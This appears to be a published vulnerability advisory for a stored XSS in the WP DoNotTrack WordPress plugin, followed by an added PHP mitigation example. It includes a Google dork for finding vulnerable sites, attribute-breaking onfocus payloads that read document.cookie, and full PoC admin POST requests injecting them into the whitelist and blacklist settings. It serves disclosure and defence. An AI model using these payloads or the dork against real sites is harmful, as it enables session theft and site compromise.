/*!
 - # VULNERABILITY: WP DoNotTrack WordPress Plugin <= 0.8.8 - Authenticated Persistent XSS
 - # GOOGLE DORK: inurl:/wp-content/plugins/wp-donottrack/
 - # DATE: 2021-05-03
 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
 - # VENDOR: Frank Goossens [ http://blog.futtta.be ]
 - # SOFTWARE VERSION: <= 0.8.8
 - # SOFTWARE LINK: https://wordpress.org/plugins/wp-donottrack/
 - # CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
 - # CWE: CWE-79
 - # CVE: N/A
*/

### -- [ Info: ]

[i] An Authenticated Persistent XSS vulnerability was discovered in the WP DoNotTrack plugin through v0.8.8 for WordPress.
[i] Vulnerable parameter(s): &whitelist=, &blacklist=.

### -- [ Impact: ]

[~] Malicious JavaScript code injection and the ability to chain attack vectors against the targeted system, which can lead to a complete compromise of the resource.

### -- [ Payloads: ]

[$] " autofocus=autofocus onfocus=alert(document.cookie);>
[$] " autofocus=autofocus onfocus=alert(origin);>

### -- [ PoC #1 | Authenticated Persistent XSS | Whitelist: ]

[!]
POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

option_page=dnt-settings-group&action=update&_wpnonce=5988804004&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Ddnt_settings_page&ifdnt=0&agressive=1&listmode=0&whitelist=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B%3E&blacklist=

### -- [ PoC #2 | Authenticated Persistent XSS | Blacklist: ]

[!]
POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 254

option_page=dnt-settings-group&action=update&_wpnonce=5988804004&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Ddnt_settings_page&ifdnt=0&agressive=1&listmode=0&whitelist=&blacklist=%22+autofocus%3Dautofocus+onfocus%3Dalert%28origin%29%3B%3E

### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
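### -- [ Mitigation example (added, not the plugin's or the advisory's code): ]

The stored XSS above exists because the whitelist/blacklist values posted to options.php are saved and echoed back into the settings form unsanitized. The block below shows the defender-side fix in WordPress terms: register both options with a sanitize callback that accepts only dotted hostnames, and escape the stored value with esc_attr() when rendering the field. The option group and field names are taken from the PoC requests; the dnt_example_* function names and the hostname-only list format are assumptions.

```php
<?php
// Added example: hardened handling of the two settings named in the PoC.
// Option group 'dnt-settings-group' and fields 'whitelist'/'blacklist' come
// from the advisory; everything prefixed dnt_example_ is assumed.

// Sanitize callback: keep only comma-separated entries that are dotted hostnames.
// Anything containing quotes, '<', '>' or '=' (such as the PoC payloads) is dropped
// and reported through the Settings API error mechanism.
function dnt_example_sanitize_hostlist( $raw, $option = 'dnt_hostlist' ) {
    $clean = array();
    foreach ( explode( ',', (string) $raw ) as $entry ) {
        $entry = strtolower( trim( $entry ) );
        if ( '' === $entry ) {
            continue;
        }
        // Allow-list: DNS labels of [a-z0-9-] joined by dots, alphabetic TLD.
        if ( preg_match( '/^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$/', $entry ) ) {
            $clean[] = $entry;
        } else {
            add_settings_error(
                $option,
                'dnt_example_invalid_host',
                sprintf( 'Ignored invalid host entry: %s', esc_html( $entry ) )
            );
        }
    }
    return implode( ',', array_unique( $clean ) );
}

// Register both options so that options.php runs the callback before saving.
function dnt_example_register_settings() {
    foreach ( array( 'whitelist', 'blacklist' ) as $name ) {
        register_setting(
            'dnt-settings-group',
            $name,
            array(
                'type'              => 'string',
                'sanitize_callback' => 'dnt_example_sanitize_hostlist',
                'default'           => '',
            )
        );
    }
}
add_action( 'admin_init', 'dnt_example_register_settings' );

// Output side: escape the stored value when echoing it into the value="" attribute,
// so a stray double quote can never close the attribute and add event handlers.
function dnt_example_render_field( $name ) {
    printf(
        '<input type="text" name="%1$s" id="%1$s" value="%2$s" />',
        esc_attr( $name ),
        esc_attr( get_option( $name, '' ) )
    );
}
```

Both layers matter: the sanitize callback stops the payload from being stored, and esc_attr() on output neutralizes any value that reaches the database by another path.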